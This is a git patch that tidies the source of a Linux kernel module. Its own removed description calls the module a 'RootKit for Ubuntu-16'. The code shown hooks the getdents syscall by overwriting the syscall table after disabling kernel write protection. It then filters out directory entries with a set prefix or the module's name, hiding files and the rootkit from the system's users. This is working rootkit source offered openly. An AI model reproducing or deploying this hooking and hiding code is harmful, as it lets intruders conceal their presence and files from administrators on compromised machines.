From 7126d0197cfbba390660d8da2d82ffc9eaa5b462 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Tue, 19 Nov 2019 15:58:29 +0100 Subject: [PATCH] cleaning up --- 8008135.c | 101 +++++++++++++++++++++++++++++++++++++++++++++--------- 1 file changed, 85 insertions(+), 16 deletions(-) diff --git a/8008135.c b/8008135.c index a706335..0eb6a63 100644 --- a/8008135.c +++ b/8008135.c @@ -1,3 +1,24 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/**** Includes *************************************************************** +*******************************************************************************/ #include #include #include @@ -6,58 +27,97 @@ #include #include "sysgen.h" + +/**** Defines ***************************************************************** +*******************************************************************************/ + #define GETDENTS_SYSCALL_NUM 78 #define WRITE_PROTECT_FLAG (1<<16) + #define HIDE_PREFIX "8008135." -#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX)-1) +#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) + #define MODULE_NAME "8008135" #define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) +/**** Modinfo **************************************************************** +*******************************************************************************/ +MODULE_LICENSE("GPLv3"); +MODULE_AUTHOR("JanKoernerEnterprises"); +MODULE_DESCRIPTION("8008135"); +MODULE_VERSION("0.1"); +/**** type ******************************************************************* +*******************************************************************************/ struct linux_dirent { unsigned long d_ino; unsigned long d_off; - unsigned short d_reclen; // d_reclen is the way to tell the length of this entry - char d_name[1]; // the struct value is actually longer than this, and d_name is variable width. + unsigned short d_reclen; // d_reclen is the way to tell the length of this entry + char d_name[1]; // the struct value is actually longer than this, and d_name is variable width. }; -MODULE_AUTHOR("JKE"); -MODULE_LICENSE("GPL v2"); -MODULE_DESCRIPTION("RootKit for Ubuntu-16"); +typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count); + +/**** var ******************************************************************** +*******************************************************************************/ -typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count); sys_getdents_t sys_getdents_orig = NULL; -// our new getdents handler -asmlinkage long sys_getdents_new(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count) { +/*** FUNCTION **************************************************************** +* NAME: sys_getdents_new +* DESCRIPTION: function overriding the original getdents +* PARAMETERS: - +* RETURNS: - +*******************************************************************************/ +asmlinkage long sys_getdents_new(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count) { int boff; struct linux_dirent* ent; + long ret = sys_getdents_orig(fd, dirent, count); + char* dbuf; + if (ret <= 0) { return ret; } + dbuf = (char*)dirent; + // go through the entries, looking for one that has our prefix for (boff = 0; boff < ret;) { + ent = (struct linux_dirent*)(dbuf + boff); - if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) // if it has the hide prefix - || (strstr(ent->d_name, MODULE_NAME) != NULL)) { // or if it has the module name anywhere in it + // if it has hide prefix or module name anywhere, hide it + if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) + || (strstr(ent->d_name, MODULE_NAME) != NULL)) { + // remove this entry by copying everything after it forward - memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen)); // and adjust the length reported + memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, + ret - (boff + ent->d_reclen)); ret -= ent->d_reclen; } else { // on to the next entry boff += ent->d_reclen; } } + return ret; } -static int __init lkm_example_init(void) { +/*** FUNCTION **************************************************************** +* NAME: 8008135_init +* DESCRIPTION: initializing Kernel Module +* PARAMETERS: - +* RETURNS: int +*******************************************************************************/ +static int __init init_8008135(void) { printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table); // record the original getdents handler @@ -78,7 +138,14 @@ static int __init lkm_example_init(void) { return 0; } -static void __exit lkm_example_exit(void) { + +/*** FUNCTION **************************************************************** +* NAME: 8008135_exit +* DESCRIPTION: unloading Kernel Module +* PARAMETERS: - +* RETURNS: - +*******************************************************************************/ +static void __exit exit_8008135(void) { // allow us to write to read onlu pages write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); // set getdents handler back @@ -88,5 +155,7 @@ static void __exit lkm_example_exit(void) { printk(KERN_INFO "Old syscall back\n"); } -module_init(lkm_example_init); -module_exit(lkm_example_exit); \ No newline at end of file + +// Setting pointers to init-/exit-functions +module_init(init_8008135); +module_exit(exit_8008135); \ No newline at end of file